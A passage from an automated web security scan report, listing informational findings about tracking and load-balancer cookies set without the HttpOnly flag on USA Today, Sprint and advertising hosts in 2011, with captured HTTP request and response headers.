GIF89a.............................................................}..t..k.`.\|.Yx.au._u._t.Ut.]q.Pq.Ml.Tk.Pg}Ih.Mg.Jd}Fe.GazBa.E_xI_tC^wG]r=^}E]uA[u?Zs@ZtAZq8Yy=Wq5Uv:Tn8Sl7Qk0Pr3Nh+Mm/Je8IZ6GX,Gb4
...[SNIP]...

14.114. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 618
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "1ea694b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:25 GMT
Connection: close

GIF89a................[..\..^.._..?..C..E..G..H..I..J..K..L..N..P..R..T..U..V..W..X..Y..~...........3..>..E..F..a..c..d..d..i...........................................................................
...[SNIP]...

14.115. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/checkplayer.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/scripts/flXHR/checkplayer.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/checkplayer.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 9326
Content-Type: application/x-javascript
Last-Modified: Wed, 31 Aug 2011 20:08:09 GMT
Accept-Ranges: bytes
ETag: "80dafbb31968cc1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:18 GMT
Connection: close

/*    CheckPlayer 1.0.2 <http://checkplayer.flensed.com/>
   Copyright (c) 2008 Kyle Simpson, Getify Solutions, Inc.
   This software is released under the MIT License <http://www.opensource.org/licenses/m
...[SNIP]...

14.116. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flXHR.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/scripts/flXHR/flXHR.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/flXHR.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: usatprod=R1449690983; s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 12759
Content-Type: application/x-javascript
Last-Modified: Wed, 31 Aug 2011 20:08:09 GMT
Accept-Ranges: bytes
ETag: "80dafbb31968cc1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:18 GMT
Connection: close

/* flXHR 1.0.5 <http://flxhr.flensed.com/> | Copyright (c) 2008-2010 Kyle Simpson, Getify Solutions, Inc. | This software is released under the MIT License <http://www.opensource.org/licenses/mit-lice
...[SNIP]...

14.117. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flensed.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/scripts/flXHR/flensed.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/flensed.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; usatprod=R1449690983; USATINFO=Handle%3D

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 3823
Content-Type: application/x-javascript
Last-Modified: Wed, 31 Aug 2011 20:08:09 GMT
Accept-Ranges: bytes
ETag: "80dafbb31968cc1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:19 GMT
Connection: close

/*    flensedCore 1.0 <http://www.flensed.com/>
   Copyright (c) 2008 Kyle Simpson, Getify Solutions, Inc.
   This software is released under the MIT License <http://www.opensource.org/licenses/mit-license
...[SNIP]...

14.118. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; usatprod=R1449690983; USATINFO=Handle%3D

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 3384
Content-Type: application/x-javascript
Last-Modified: Wed, 31 Aug 2011 20:08:09 GMT
Accept-Ranges: bytes
ETag: "80dafbb31968cc1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:19 GMT
Connection: close

/*    jQuery.flXHRproxy 1.2.2 <http://flxhr.flensed.com/>
   Copyright (c) 2009 Kyle Simpson
   This software is released under the MIT License <http://www.opensource.org/licenses/mit-license.php>

   Thi
...[SNIP]...

14.119. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 761
Content-Type: application/x-javascript
Last-Modified: Wed, 31 Aug 2011 20:08:09 GMT
Accept-Ranges: bytes
ETag: "80dafbb31968cc1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:18 GMT
Connection: close

/**
* jQuery.XHR
* Copyright (c) 2008 Ariel Flesler - aflesler(at)gmail(dot)com | http://flesler.blogspot.com
* Dual licensed under MIT and GPL.
* Date: 8/7/2008
*
* @projectDescription Re
...[SNIP]...

14.120. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/swfobject.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/scripts/flXHR/swfobject.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/swfobject.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; usatprod=R1449690983; USATINFO=Handle%3D

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 9763
Content-Type: application/x-javascript
Last-Modified: Wed, 31 Aug 2011 20:08:09 GMT
Accept-Ranges: bytes
ETag: "80dafbb31968cc1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:19 GMT
Connection: close

/* SWFObject v2.1 <http://code.google.com/p/swfobject/>
Copyright (c) 2007-2008 Geoff Stearns, Michael Williams, and Bobby van der Sluis
This software is released under the MIT License <http://www
...[SNIP]...

14.121. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/pluckApps.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/scripts/pluckApps.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/pluckApps.js?skipCSS=true HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 185752
Content-Type: application/x-javascript
Last-Modified: Sat, 03 Sep 2011 08:35:45 GMT
Accept-Ranges: bytes
ETag: "80c61179146acc1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:16 GMT
Connection: close

(function(window,undefined){var jQuery=function(selector,context){return new jQuery.fn.init(selector,context);},_jQuery=window.jQuery,_$=window.$,document=window.document,rootjQuery,quickExpr=/^[^<]
...[SNIP]...

14.122. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Stats/Tracker.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

usatprod=R1449690983; path=/
SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.123. http://sitelife.usatoday.com/ver1.0/content/ua/css/pluckAll.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/content/ua/css/pluckAll.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/content/ua/css/pluckAll.css HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 163000
Content-Type: text/css
Last-Modified: Sat, 03 Sep 2011 08:35:49 GMT
Accept-Ranges: bytes
ETag: "8020747b146acc1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:15 GMT
Connection: close

.pluck-css-loaded{border-bottom-color:#010204}p.pluck-error-message{color:#c33}p.pluck-confirm-message,.pluck-score-em{color:#c63}a.pluck-primary-button,span.pluck-confirm-btn a,.pluck-login-comment-i
...[SNIP]...

14.124. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/sys/jsonp.app

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

usatprod=R1449690983; path=/
SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=545853.blog&clientUrl=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; usatprod=R1449690983

Response

14.125. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/usat/pluck/comments/comments.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

usatprod=R1449690983; path=/
SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.126. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/usat/pluck/pluck.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

usatprod=R1449690983; path=/
SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.127. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sprint.tt.omtrdc.net
Path:	/m2/sprint/mbox/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

mboxPC=1315097027971-178294.19; Domain=sprint.tt.omtrdc.net; Expires=Sun, 18-Sep-2011 00:45:30 GMT; Path=/m2/sprint

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/sprint/mbox/standard?mboxHost=www.sprint.com&mboxSession=1315097027971-178294&mboxPage=1315097027971-178294&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=sprint-interstitial-mbox&mboxId=0&mboxTime=1315079036636&mboxURL=http%3A%2F%2Fwww.sprint.com%2F&mboxReferrer=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dsprint%26date%3D2011-9-3%26sa%3DX&mboxVersion=40 HTTP/1.1
Host: sprint.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

14.128. http://statse.webtrendslive.com/dcsncwimc10000kzgoor3wv9x_3f2v/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://statse.webtrendslive.com
Path:	/dcsncwimc10000kzgoor3wv9x_3f2v/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAIAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAALLMYk7NyWJOBAAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAACyzGJOzcliTgAAAAA-; path=/; expires=Wed, 01-Sep-2021 00:56:18 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsncwimc10000kzgoor3wv9x_3f2v/dcs.gif?&dcsdat=1315097075434&dcssip=www.reuters.com&dcsuri=/article/2011/09/03/us-weather-football-idUSTRE78222D20110903&dcsref=http://www.google.com/trends/hottrends%3Fq=notre%2Bdame%2Bfootball%26date=2011-9-3%26sa=X&WT.co_f=50.23.123.106-4086325760.30173190&WT.vtid=50.23.123.106-4086325760.30173190&WT.vtvs=1315097075506&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=19&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Notre%20Dame%20football%20stadium%20cleared%20due%20to%20lightning%20|%20Reuters&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1233x1037&WT.fv=10.3&WT.slv=Unknown&WT.tv=8.6.0&WT.dl=0&WT.ssl=0&WT.es=www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903&WT.cg_n=News%20-%20US&WT.cg_s=domesticNews&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&ChannelList=domesticNews;Honda;Inspiration;everything;treasuryMarkets;Deals;Shell;Amtrak;Amtrak2;yahoo3;VerizonMap;echoActivityStream;Hyundai;everythingButHugin;SprintNow;OutloudFeed;chsgrains;ciscoenterprise;CFA;samsung;asia&Comments=1&ModID=domesticNews|Text|13827288_Most%20Read%20Articles;domesticNews|Text|13827289_Most%20Shared%20Articles;domesticNews|Text|13827290_Most%20Discussed%20Articles;domesticNews|Text|13827291_Most%20Watched%20Videos;domesticNews|Text|13483695_Related%20Topics&ModImp=1&VBC=cfa&ContentType=Text&ContentID=USTRE78222D20110903&ContentChannel=domesticNews&ContentID_domesticNews=USTRE78222D20110903&ContentHeadline=Notre%2BDame%2Bfootball%2Bstadium%2Bcleared%2Bdue%2Bto%2Blightning&PageNumber=1&PageTotal=1&rChannel=News&rCountry=BETAUS&DartZone=us.reuters/news/us/article HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAHAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OAwAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 00:56:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAIAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAALLMYk7NyWJOBAAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAACyzGJOzcliTgAAAAA-; path=/; expires=Wed, 01-Sep-2021 00:56:18 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

14.129. http://sync.adap.tv/sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.adap.tv
Path:	/sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rtbData0="key=turn:value=2925993182975414771:expiresAt=Sat+Sep+10+17%3A44%3A51+PDT+2011:32-Compatible=true";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 02:31:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.130. http://sync.mathtag.com/sync/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ts=1315099467; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 01:24:27 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync/img HTTP/1.1
Host: sync.mathtag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.131. http://tacoda.at.atwola.com/rtx/r.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.js

Issue detail

